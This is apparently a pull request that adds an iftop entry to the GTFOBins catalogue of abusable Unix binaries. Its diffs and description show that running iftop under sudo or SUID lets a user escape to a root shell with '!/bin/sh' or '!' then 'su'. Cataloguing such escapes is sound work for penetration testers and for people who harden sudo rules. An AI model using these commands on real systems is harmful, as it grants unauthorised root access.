### PR TITLE
Priviliges Escalation using Iftop with sudo

### DIFF
--- a/_gtfobins/iftop.md
+++ b/_gtfobins/iftop.md
@@ -1,9 +1,9 @@
 ---
 functions:
   sudo:
-  - description: After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.
-  - code: |
-      sudo iftop
-      !
-      su
+    - description: After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.
+      code: |
+        sudo iftop
+        !
+        su
 ---

--- a/_gtfobins/iftop.md
+++ b/_gtfobins/iftop.md
@@ -4,6 +4,5 @@ functions:
     - description: After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.
       code: |
         sudo iftop
-        !
-        su
+        !/bin/sh
 ---

--- a/_gtfobins/iftop.md
+++ b/_gtfobins/iftop.md
@@ -1,8 +1,16 @@
 ---
+description: This requires `iftop` 1.17 and the privilege to capture on some device (specify with `-i` if needed) .
 functions:
+  shell:
+    - code: |
+        iftop
+        !/bin/sh
+  limited-suid:
+    - code: |
+        ./iftop
+        !/bin/sh
   sudo:
-    - description: After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.
-      code: |
+    - code: |
         sudo iftop
         !/bin/sh
 ---

--- a/_gtfobins/iftop.md
+++ b/_gtfobins/iftop.md
@@ -1,0 +1,9 @@
+---
+functions:
+  sudo:
+  - description: After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.
+  - code: |
+      sudo iftop
+      !
+      su
+---


### PR DESCRIPTION
Iftop displays bandwidth usage on an interface by the host. In the previous versions of iftop, it allowed users to execute commands interactively after being invoked. 

If it is called with sudo, all the commands will run in the context of the root user which can be used to escalate privileges.  

After getting invoked iftop (>= 1.17), displays network usage details. User can enter and execute commands interactively.

```
sudo iftop (goes into interactive mode)
!
su
```